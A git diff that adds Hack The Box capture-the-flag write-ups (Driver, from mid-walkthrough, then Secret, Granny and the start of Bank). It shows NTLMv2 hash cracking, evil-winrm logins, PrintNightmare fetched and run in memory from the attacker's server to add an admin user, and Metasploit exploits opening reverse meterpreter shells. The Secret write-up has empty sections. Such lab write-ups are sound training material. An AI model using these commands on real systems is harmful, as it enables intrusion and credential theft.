+ [*] Skipping previously captured hash for DRIVER\tony
+ [*] Skipping previously captured hash for DRIVER\tony
+ [*] Skipping previously captured hash for DRIVER\tony
+ [*] Skipping previously captured hash for DRIVER\tony**
+
+
+And we got a response on our file gets uploaded! So we recieved a NTLMv2 Hash, coming from the username tony. So let's crack the NTLMv2 Hash using rockyou.txt:
+
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Driver]
+ → sudo hashcat hash -m5600 $(locate rockyou.txt)
+ [sudo] password for nothing:
+ hashcat (v6.2.6) starting
+
+ * Device #1: WARNING! Kernel exec timeout is not disabled.
+ This may cause "CL_OUT_OF_RESOURCES" or related errors.
+ To disable the timeout, see: https://hashcat.net/q/timeoutpatch
+ * Device #2: WARNING! Kernel exec timeout is not disabled.
+ This may cause "CL_OUT_OF_RESOURCES" or related errors.
+ To disable the timeout, see: https://hashcat.net/q/timeoutpatch
+ CUDA API (CUDA 11.8)
+ ====================
+ * Device #1: NVIDIA GeForce RTX 3070 Ti, 5906/7981 MB, 48MCU
+
+ OpenCL API (OpenCL 3.0 CUDA 11.8.87) - Platform #1 [NVIDIA Corporation]
+ =======================================================================
+ * Device #2: NVIDIA GeForce RTX 3070 Ti, skipped
+
+ Minimum password length supported by kernel: 0
+ Maximum password length supported by kernel: 256
+
+ Hashes: 1 digests; 1 unique digests, 1 unique salts
+ Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
+ Rules: 1
+
+ Optimizers applied:
+ * Zero-Byte
+ * Not-Iterated
+ * Single-Hash
+ * Single-Salt
+
+ ATTENTION! Pure (unoptimized) backend kernels selected.
+ Pure kernels can crack longer passwords, but drastically reduce performance.
+ If you want to switch to optimized kernels, append -O to your commandline.
+ See the above message to find out about the exact limits.
+
+ Watchdog: Temperature abort trigger set to 90c
+
+ Host memory required for this attack: 843 MB
+
+ Dictionary cache built:
+ * Filename..: /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt.tar.gz
+ * Passwords.: 14344392
+ * Bytes.....: 139923457
+ * Keyspace..: 14344383
+ * Runtime...: 1 sec
+
+ TONY::DRIVER:64ee36aaad12f422:90cd51833ec5c7fd768608dc128b0072:0101000000000000007514f0dafdd80130d95b9d9fce853d0000000002000800330050004f00390001001e00570049004e002d004b00500042004b0054003200360045004b005200450004003400570049004e002d004b00500042004b0054003200360045004b00520045002e00330050004f0039002e004c004f00430041004c0003001400330050004f0039002e004c004f00430041004c0005001400330050004f0039002e004c004f00430041004c0007000800007514f0dafdd8010600040002000000080030003000000000000000000000000020000082e65a8610e38b2dcba3bf1a4b03692bfc2d79b0f9ec686f467516427284bdd40a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e0031003400000000000000000000000000:liltony
+
+ Session..........: hashcat
+ Status...........: Cracked
+ Hash.Mode........: 5600 (NetNTLMv2)
+ Hash.Target......: TONY::DRIVER:64ee36aaad12f422:90cd51833ec5c7fd76860...000000
+ Time.Started.....: Mon Nov 21 19:57:17 2022 (1 sec)
+ Time.Estimated...: Mon Nov 21 19:57:18 2022 (0 secs)
+ Kernel.Feature...: Pure Kernel
+ Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt.tar.gz)
+ Guess.Queue......: 1/1 (100.00%)
+ Speed.#1.........: 69153.6 kH/s (3.71ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
+ Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
+ Progress.........: 3145728/14344383 (21.93%)
+ Rejected.........: 0/3145728 (0.00%)
+ Restore.Point....: 0/14344383 (0.00%)
+ Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
+ Candidate.Engine.: Device Generator
+ Candidates.#1....: 12345 -> tomabogdan
+ Hardware.Mon.#1..: Temp: 53c Fan: 57% Util: 30% Core:1830MHz Mem:9501MHz Bus:16
+
+ Started: Mon Nov 21 19:57:11 2022
+ Stopped: Mon Nov 21 19:57:18 2022
+
+
+
+So now we have the credentials **tony:liltony** , let's connect with an evil-winrm shell :
+
+
+ [ 10.10.14.37/23 ] [ /dev/pts/15 ] [Nextcloud/blog]
+ → evil-winrm -i driver.htb -u tony -p liltony
+
+ Evil-WinRM shell v3.4
+
+ Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
+
+ Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
+
+ Info: Establishing connection to remote endpoint
+
+ *Evil-WinRM* PS C:\Users\tony\Documents> whoami
+ driver\tony
+ *Evil-WinRM* PS C:\Users\tony\Documents> cd ..
+ cd De*Evil-WinRM* PS C:\Users\tony> cd Desktop
+ *Evil-WinRM* PS C:\Users\tony\Desktop> type user.txt
+ 97XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And we got the User flag!
+
+## **Part 3 : Getting Root Access**
+
+Now in order to enumerate privesc paths, we run winpeas:
+
+
+ [ 10.10.14.37/23 ] [ /dev/pts/15 ] [Nextcloud/blog]
+ → evil-winrm -i driver.htb -u tony -p liltony
+
+ Evil-WinRM shell v3.4
+
+ Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
+
+ Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
+
+ Info: Establishing connection to remote endpoint
+
+ *Evil-WinRM* PS C:\Users\tony\Documents> upload /home/nothing/HTB/Driver/winPEAS.bat
+ Info: Uploading /home/nothing/HTB/Driver/winPEAS.bat to C:\Users\tony\Documents\winPEAS.bat
+
+
+ Data: 47928 bytes of 47928 bytes copied
+
+ Info: Upload successful!
+
+ *Evil-WinRM* PS C:\Users\tony\Documents> .\winPEAS.bat
+
+
+
+` 
+
+Let it run, then we get a hint towards the ConsoleHost_history text file:
+
+
+
+
+ *Evil-WinRM* PS C:\Users\tony\Documents> cat C:\users\tony\appdata\roaming\microsoft\windows\PowerShell\PSReadline\ConsoleHost_history.txt
+ Add-Printer -PrinterName "RICOH_PCL6" -DriverName 'RICOH PCL6 UniversalDriver V4.23' -PortName 'lpt1:'
+
+ ping 1.1.1.1
+ ping 1.1.1.1
+
+
+
+Here we see history file contains a comamnd to add a printer with the RICOH_PCL6 printer driver. So when we look for exploits we find the [CVE-2021-34527](https://github.com/JohnHammond/CVE-2021-34527) local privesc vulnerability:
+
+
+ [term1]
+ *Evil-WinRM* PS C:\programdata\RICOH_DRV\RICOH PCL6 UniversalDriver V4.23\_common\dlz> icacls *.dll
+ borderline.dll Everyone:(F)
+
+ colorbalance.dll Everyone:(F)
+
+ headerfooter.dll Everyone:(F)
+
+ jobhook.dll Everyone:(F)
+
+ outputimage.dll Everyone:(F)
+
+ overlaywatermark.dll Everyone:(F)
+
+ popup.dll Everyone:(F)
+
+ printercopyguardpreview.dll Everyone:(F)
+
+ printerpreventioncopypatternpreview.dll Everyone:(F)
+
+ secretnumberingpreview.dll Everyone:(F)
+
+ watermark.dll Everyone:(F)
+
+ watermarkpreview.dll Everyone:(F)
+
+ Successfully processed 12 files; Failed processing 0 files
+
+ [term2]
+ [ 10.10.14.17/23 ] [ /dev/pts/16 ] [~/HTB/Driver]
+ → git clone https://github.com/JohnHammond/CVE-2021-34527
+ Cloning into 'CVE-2021-34527'...
+ remote: Enumerating objects: 17, done.
+ remote: Counting objects: 100% (17/17), done.
+ remote: Compressing objects: 100% (15/15), done.
+ remote: Total 17 (delta 2), reused 17 (delta 2), pack-reused 0
+ Receiving objects: 100% (17/17), 124.90 KiB | 617.00 KiB/s, done.
+ Resolving deltas: 100% (2/2), done.
+
+ [ 10.10.14.17/23 ] [ /dev/pts/16 ] [~/HTB/Driver]
+ → cd CVE-2021-34527
+
+ [ 10.10.14.17/23 ] [ /dev/pts/16 ] [HTB/Driver/CVE-2021-34527]
+ → ls
+ CVE-2021-34527.ps1 nightmare-dll README.md
+
+ [ 10.10.14.17/23 ] [ /dev/pts/16 ] [HTB/Driver/CVE-2021-34527]
+ → cp CVE-2021-34527.ps1 exploit.ps1
+
+ [ 10.10.14.17/23 ] [ /dev/pts/16 ] [HTB/Driver/CVE-2021-34527]
+ → python3 -m http.server 8080
+ Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
+
+
+
+Then download the ps1 exploit onto the box and run it:
+
+
+ *Evil-WinRM* PS C:\Users\tony\Documents> Invoke-webrequest -uri http://10.10.14.17:8080/exploit.ps1 -Outfile exploit.ps1
+ *Evil-WinRM* PS C:\Users\tony\Documents> .\exploit.ps1
+ File C:\Users\tony\Documents\exploit.ps1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170.
+ At line:1 char:1
+ + .\exploit.ps1
+ + ~~~~~~~~~~~~~
+ + CategoryInfo : SecurityError: (:) [], PSSecurityException
+ + FullyQualifiedErrorId : UnauthorizedAccess
+
+
+
+However it doesn't let us run scripts on the machine, so instead we're going to run it from memory:
+
+
+ *Evil-WinRM* PS C:\Users\tony\Documents> iex(new-object net.webclient).downloadstring('http://10.10.14.17:8080/exploit.ps1')
+ *Evil-WinRM* PS C:\Users\tony\Documents> Invoke-Nightmare -NewUser "nihilist" -NewPassword "nihilist123"
+ [+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll
+ [+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
+ [+] added user nihilist as local administrator
+ [+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll
+
+
+
+And then login as the new user we created:
+
+
+ [ 10.10.14.17/23 ] [ /dev/pts/17 ] [HTB/Driver/CVE-2021-34527]
+ → evil-winrm -i driver.htb -u nihilist -p nihilist123
+
+ Evil-WinRM shell v3.4
+
+ Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
+
+ Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
+
+ Info: Establishing connection to remote endpoint
+
+ *Evil-WinRM* PS C:\Users\nihilist\Documents> cd ..\..\Administrator\Desktop
+ *Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
+ f3XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! we managed to get the root flag!
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/71.md b/Easy/71.md
new file mode 100644
index 0000000..754fe54
--- /dev/null
+++ b/Easy/71.md
@@ -0,0 +1,275 @@
+# Secret Writeup
+
+
+
+## Introduction :
+
+Secret is an easy box released back in October 2021.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.17/23 ] [ /dev/pts/16 ] [~/HTB/Secret]
+ → nmap -sCV secret.htb
+ Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-01 15:42 CET
+ Nmap scan report for secret.htb (10.129.21.112)
+ Host is up (0.081s latency).
+ Not shown: 997 closed tcp ports (conn-refused)
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 3072 97af61441089b953f0803fd719b1e29c (RSA)
+ | 256 95ed658dcd082b55dd1751311e3e1812 (ECDSA)
+ |_ 256 337bc171d3330f924e835a1f5202935e (ED25519)
+ 80/tcp open http nginx 1.18.0 (Ubuntu)
+ |_http-server-header: nginx/1.18.0 (Ubuntu)
+ |_http-title: DUMB Docs
+ 3000/tcp open http Node.js (Express middleware)
+ |_http-title: DUMB Docs
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 17.30 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 so let's investigate:
+
+
+
+we run ffuf to look for directories on port 80:
+
+
+ [ 10.10.14.17/23 ] [ /dev/pts/16 ] [~/HTB/Secret]
+ → ffuf -u http://secret.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,307,401 -t 50
+
+ /'___\ /'___\ /'___\
+ /\ \__/ /\ \__/ __ __ /\ \__/
+ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
+ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
+ \ \_\ \ \_\ \ \____/ \ \_\
+ \/_/ \/_/ \/___/ \/_/
+
+ v1.5.0 Kali Exclusive
+ ________________________________________________
+
+ :: Method : GET
+ :: URL : http://secret.htb/FUZZ
+ :: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt
+ :: Follow redirects : false
+ :: Calibration : false
+ :: Timeout : 10
+ :: Threads : 50
+ :: Matcher : Response status: 200,204,301,302,307,401
+ ________________________________________________
+
+ api [Status: 200, Size: 93, Words: 12, Lines: 1, Duration: 102ms]
+ api/experiments [Status: 200, Size: 93, Words: 12, Lines: 1, Duration: 103ms]
+ api/experiments/configurations [Status: 200, Size: 93, Words: 12, Lines: 1, Duration: 97ms]
+ assets [Status: 301, Size: 179, Words: 7, Lines: 11, Duration: 83ms]
+ docs [Status: 200, Size: 20720, Words: 6752, Lines: 487, Duration: 102ms]
+ download [Status: 301, Size: 183, Words: 7, Lines: 11, Duration: 108ms]
+ :: Progress: [4713/4713] :: Job [1/1] :: 405 req/sec :: Duration: [0:00:10] :: Errors: 0 ::
+
+
+
+Reading the docs we get a hint as to how to use the API to create an account on port 3000:
+
+  
+
+From here, we create an account at **/api/user/register**
+
+
+ POST /api/user/register HTTP/1.1
+ Host: secret.htb:3000
+ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ Accept-Language: en-US,en;q=0.5
+ Accept-Encoding: gzip, deflate
+ Referer: http://secret.htb:3000/
+ Connection: close
+ Upgrade-Insecure-Requests: 1
+ Pragma: no-cache
+ Cache-Control: no-cache
+ Content-Type: application/json
+ Content-Length: 82
+
+ {
+ "name":"nihilist",
+ "email":"nihil@nowhere.com",
+ "password":"nihilist"
+ }
+
+
+
+` 
+
+Then we get the JWT auth-token by going to **/api/user/login/**
+
+
+ POST /api/user/login HTTP/1.1
+ Host: secret.htb:3000
+ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ Accept-Language: en-US,en;q=0.5
+ Accept-Encoding: gzip, deflate
+ Referer: http://secret.htb:3000/
+ Connection: close
+ Upgrade-Insecure-Requests: 1
+ Pragma: no-cache
+ Cache-Control: no-cache
+ Content-Type: application/json
+ Content-Length: 61
+
+ {
+ "email":"nihil@nowhere.com",
+ "password":"nihilist"
+ }
+
+
+` 
+
+So here we have the following JWT token:
+
+
+ eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2Mzg4YzViYTU0OTM3ZTA0N2ExYmVmZDYiLCJuYW1lIjoibmloaWxpc3QiLCJlbWFpbCI6Im5paGlsQG5vd2hlcmUuY29tIiwiaWF0IjoxNjY5OTA4MDc2fQ.15gBFxEXh2My4CaXqNT0LR4jYymWsnXx0iRU8PFcKpE
+
+
+
+With it, we can make a request to /api/priv/ :
+
+
+ GET /api/priv HTTP/1.1
+ Host: secret.htb:3000
+ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
+ auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2Mzg4YzViYTU0OTM3ZTA0N2ExYmVmZDYiLCJuYW1lIjoibmloaWxpc3QiLCJlbWFpbCI6Im5paGlsQG5vd2hlcmUuY29tIiwiaWF0IjoxNjY5OTA4MDc2fQ.15gBFxEXh2My4CaXqNT0LR4jYymWsnXx0iRU8PFcKpE
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ Accept-Language: en-US,en;q=0.5
+ Accept-Encoding: gzip, deflate
+ Referer: http://secret.htb:3000/
+ Connection: close
+ Upgrade-Insecure-Requests: 1
+ Pragma: no-cache
+ Cache-Control: no-cache
+ Content-Type: application/json
+ Content-Length: 0
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/8.md b/Easy/8.md
new file mode 100644
index 0000000..f75cec0
--- /dev/null
+++ b/Easy/8.md
@@ -0,0 +1,335 @@
+# Granny Writeup
+
+
+
+## Introduction :
+
+Granny is an easy box windows box that was released back in April 2017.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Granny] → nmap -sC -sV 10.10.10.15
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-11 17:45 CET
+ Nmap scan report for 10.10.10.15
+ Host is up (0.036s latency).
+ Not shown: 999 filtered ports
+ PORT STATE SERVICE VERSION
+ 80/tcp open http Microsoft IIS httpd 6.0
+ | http-methods:
+ |_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
+ |_http-server-header: Microsoft-IIS/6.0
+ |_http-title: Under Construction
+ | http-webdav-scan:
+ | Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
+ | Server Type: Microsoft-IIS/6.0
+ | Server Date: Mon, 11 Nov 2019 16:48:07 GMT
+ | Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
+ |_ WebDAV type: Unknown
+ Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 12.76 seconds
+
+
+## **Part 2 : Getting User Access**
+
+As you can see we're dealing with IIS 6.0 which is an outdated version, with a ton of scripts for us to use, so let's fire up msfconsole :
+
+
+ msfconsole
+
+ ___ ____
+ ,-"" `. < HONK >
+ ,' _ e )`-._ / ----
+ / ,' `-._<.===-'
+ / /
+ / ;
+ _ / ;
+ (`._ _.-"" ""--..__,' |
+ <_ `-"" \
+ <`- :
+ (__ <__. ;
+ `-. '-.__. _.' /
+ \ `-.__,-' _,'
+ `._ , /__,-'
+ ""._\__,'< <____
+ | | `----.`.
+ | | \ `.
+ ; |___ \-``
+ \ --<
+ `.`.<
+ `-'
+
+
+
+ =[ metasploit v5.0.74-dev ]
+ + -- --=[ 1969 exploits - 1088 auxiliary - 338 post ]
+ + -- --=[ 558 payloads - 45 encoders - 10 nops ]
+ + -- --=[ 7 evasion ]
+
+ msf5 > update
+ [*] exec: update
+
+ [*] You have the latest version of Pwntools (4.0.1)
+ msf5 > search scstorage
+
+ Matching Modules
+ ================
+
+ # Name Disclosure Date Rank Check Description
+ - ---- --------------- ---- ----- -----------
+ 0 exploit/windows/iis/iis_webdav_scstoragepathfromurl 2017-03-26 manual Yes Microsoft IIS WebDav ScStoragePathFromUrl Overflow
+
+
+ msf5 > use exploit/windows/iis/iis_webdav_scstoragepathfromurl
+ msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set RHOSTS 10.10.10.15
+ RHOSTS => 10.10.10.15
+ msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > exploit
+
+ [*] Started reverse TCP handler on 10.10.14.10:4444
+ [*] Sending stage (180291 bytes) to 10.10.10.15
+ [*] Meterpreter session 1 opened (10.10.14.10:4444 -> 10.10.10.15:1036) at 2020-02-19 08:38:49 +0000
+ [*] Sending stage (180291 bytes) to 10.10.10.15
+ [*] Meterpreter session 2 opened (10.10.14.10:4444 -> 10.10.10.15:1037) at 2020-02-19 08:38:51 +0000
+ [-] Exploit aborted due to failure: bad-config: Server did not respond correctly to WebDAV request
+ [*] Exploit completed, but no session was created.
+ msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > exploit
+
+ [*] Started reverse TCP handler on 10.10.14.10:4444
+ [*] Trying path length 3 to 60 ...
+ [*] Sending stage (180291 bytes) to 10.10.10.15
+ [*] Meterpreter session 3 opened (10.10.14.10:4444 -> 10.10.10.15:1038) at 2020-02-19 08:39:22 +0000
+
+ meterpreter > ps
+
+ Process List
+ ============
+
+ PID PPID Name Arch Session User Path
+ --- ---- ---- ---- ------- ---- ----
+ 0 0 [System Process]
+ 4 0 System
+ 208 348 logon.scr
+ 272 4 smss.exe
+ 324 272 csrss.exe
+ 348 272 winlogon.exe
+ 396 348 services.exe
+ 408 348 lsass.exe
+ 604 396 svchost.exe
+ 676 396 svchost.exe
+ 732 396 svchost.exe
+ 776 396 svchost.exe
+ 796 396 svchost.exe
+ 932 396 spoolsv.exe
+ 960 396 msdtc.exe
+ 1080 396 cisvc.exe
+ 1128 396 svchost.exe
+ 1176 396 inetinfo.exe
+ 1212 396 svchost.exe
+ 1328 396 VGAuthService.exe
+ 1408 396 vmtoolsd.exe
+ 1456 396 svchost.exe
+ 1504 3620 rundll32.exe x86 0 C:\WINDOWS\system32\rundll32.exe
+ 1596 396 svchost.exe
+ 1696 396 alg.exe
+ 1824 604 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe
+ 1908 396 dllhost.exe
+ 2060 3620 svchost.exe x86 0 C:\WINDOWS\Temp\radA77E9.tmp\svchost.exe
+ 2304 604 wmiprvse.exe
+ 2380 3620 svchost.exe x86 0 C:\WINDOWS\Temp\rad64DF6.tmp\svchost.exe
+ 2928 3620 svchost.exe x86 0 C:\WINDOWS\Temp\rad3C906.tmp\svchost.exe
+ 3396 1080 cidaemon.exe
+ 3440 1080 cidaemon.exe
+ 3480 1080 cidaemon.exe
+ 3620 1456 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe
+ 3692 604 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe
+
+
+and we get a reverse shell ! but we need to migrate to another process in order to escalate privileges : the process number 1824 looks interesting :
+
+
+
+ meterpreter > migrate 1824
+ [*] Migrating from 1504 to 1824...
+ [*] Migration completed successfully.
+
+ meterpreter > shell
+ Process 2080 created.
+ Channel 3 created.
+ Microsoft Windows [Version 5.2.3790]
+ (C) Copyright 1985-2003 Microsoft Corp.
+
+ C:\WINDOWS\system32>cd ../..
+ ccd ../..
+
+ C:\>d Documents And Settings
+ cd Documents And Settings
+
+ C:\Documents and Settings>cd Administrator
+ cd Administrator
+ Access is denied.
+
+
+And as you can see, we still migrated to NT Authority, but we did not escalate our privileges enough.
+
+## **Part 3 : Getting Root Access**
+
+
+ C:\Documents and Settings>exit
+ meterpreter > background
+ [*] Backgrounding session 3...
+ msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > search ms14_070
+
+ Matching Modules
+ ================
+
+ # Name Disclosure Date Rank Check Description
+ - ---- --------------- ---- ----- -----------
+ 0 exploit/windows/local/ms14_070_tcpip_ioctl 2014-11-11 average Yes MS14-070 Windows tcpip!SetAddrOptions NULL Pointer Dereference
+
+
+ msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use exploit/windows/local/ms14_070_tcpip_ioctl
+ msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > set SESSION 3
+ SESSION => 3
+ msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > set payload windows/meterpreter/reverse_tcp
+ payload => windows/meterpreter/reverse_tcp
+ msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > show options
+
+ Module options (exploit/windows/local/ms14_070_tcpip_ioctl):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ SESSION 3 yes The session to run this module on.
+
+
+ Payload options (windows/meterpreter/reverse_tcp):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
+ LHOST yes The listen address (an interface may be specified)
+ LPORT 4444 yes The listen port
+
+
+ Exploit target:
+
+ Id Name
+ -- ----
+ 0 Windows Server 2003 SP2
+
+
+ msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > set LHOST 10.10.14.10
+ LHOST => 10.10.14.10
+ msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > run
+
+
+We'll use a local exploit on our backgrounded session, to see if we can escalate privileges.
+
+
+ [*] Started reverse TCP handler on 10.10.14.10:4444
+ [*] Storing the shellcode in memory...
+ [*] Triggering the vulnerability...
+ [*] Checking privileges after exploitation...
+ [+] Exploitation successful!
+ [*] Sending stage (180291 bytes) to 10.10.10.15
+ [*] Meterpreter session 4 opened (10.10.14.10:4444 -> 10.10.10.15:1039) at 2020-02-19 08:44:38 +0000
+
+ meterpreter > shell
+ [-] Unknown command: shell.
+ meterpreter > shell
+ Process 3108 created.
+ Channel 1 created.
+ Microsoft Windows [Version 5.2.3790]
+ (C) Copyright 1985-2003 Microsoft Corp.
+
+ C:\WINDOWS\system32>meterpreter >
+ meterpreter > shell
+ Process 3140 created.
+ Channel 2 created.
+ Microsoft Windows [Version 5.2.3790]
+ (C) Copyright 1985-2003 Microsoft Corp.
+
+ C:\WINDOWS\system32>cd c:\
+ cd c:\
+
+ C:\>dir
+ dir
+ Volume in drive C has no label.
+ Volume Serial Number is 246C-D7FE
+
+ Directory of C:\
+
+ 04/12/2017 04:27 PM <****DIR> ADFS
+ 04/12/2017 04:04 PM 0 AUTOEXEC.BAT
+ 04/12/2017 04:04 PM 0 CONFIG.SYS
+ 04/12/2017 09:19 PM <****DIR> Documents and Settings
+ 04/12/2017 04:17 PM <****DIR> FPSE_search
+ 04/12/2017 04:17 PM <****DIR> Inetpub
+ 12/24/2017 07:21 PM <****DIR> Program Files
+ 12/24/2017 07:30 PM <****DIR> WINDOWS
+ 04/12/2017 04:05 PM <****DIR> wmpub
+ 2 File(s) 0 bytes
+ 7 Dir(s) 18,090,029,056 bytes free
+
+ C:\>cd Documents and Settings
+ cdcd Documents and Settings
+
+ C:\Documents and Settingcd Administrator
+ cd Administrator
+
+ C:\Documents and Settings\Administrator>dir
+ dir
+ Volume in drive C has no label.
+ Volume Serial Number is 246C-D7FE
+
+ Directory of C:\Documents and Settings\Administrator
+
+ 04/12/2017 08:48 PM <****DIR> .
+ 04/12/2017 08:48 PM <****DIR> ..
+ 04/12/2017 04:28 PM <****DIR> Desktop
+ 04/12/2017 04:12 PM <****DIR> Favorites
+ 04/12/2017 04:12 PM <****DIR> My Documents
+ 04/12/2017 03:42 PM <****DIR> Start Menu
+ 04/12/2017 03:44 PM 0 Sti_Trace.log
+ 1 File(s) 0 bytes
+ 6 Dir(s) 18,090,029,056 bytes free
+
+ C:\Documents and Settings\Administrator>cd Desktop
+ cd Desktop
+
+ C:\Documents and Settings\Administrator\Desktop>dir
+ dir
+ Volume in drive C has no label.
+ Volume Serial Number is 246C-D7FE
+
+ Directory of C:\Documents and Settings\Administrator\Desktop
+
+ 04/12/2017 04:28 PM <****DIR> .
+ 04/12/2017 04:28 PM <****DIR> ..
+ 04/12/2017 09:17 PM 32 root.txt
+ 1 File(s) 32 bytes
+ 2 Dir(s) 18,090,029,056 bytes free
+
+ C:\Documents and Settings\Administrator\Desktop>type root.txt
+ type root.txt
+ aaXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+ C:\WINDOWS\system32>cd C:\Documents and Settings\Lakis\Desktop
+ cd C:\Documents and Settings\Lakis\Desktop
+
+ C:\Documents and Settings\Lakis\Desktop>type user.txt
+ type user.txt
+
+ 70XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+And that's it ! we have been able to root the box, getting both the user and the root flag in one go. :)
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/9.md b/Easy/9.md
new file mode 100644
index 0000000..6484073
--- /dev/null
+++ b/Easy/9.md
@@ -0,0 +1,256 @@
+# Bank Writeup
+
+
+
+## Introduction :
+
+Bank is an easy Linux box that was released back in June 2017.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → nmap -sC -sV 10.10.10.29
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-14 06:55 CET
+ Nmap scan report for bank.htb (10.10.10.29)
+ Host is up (0.065s latency).
+ Not shown: 997 closed ports
+ PORT STATE SERVICE VERSION
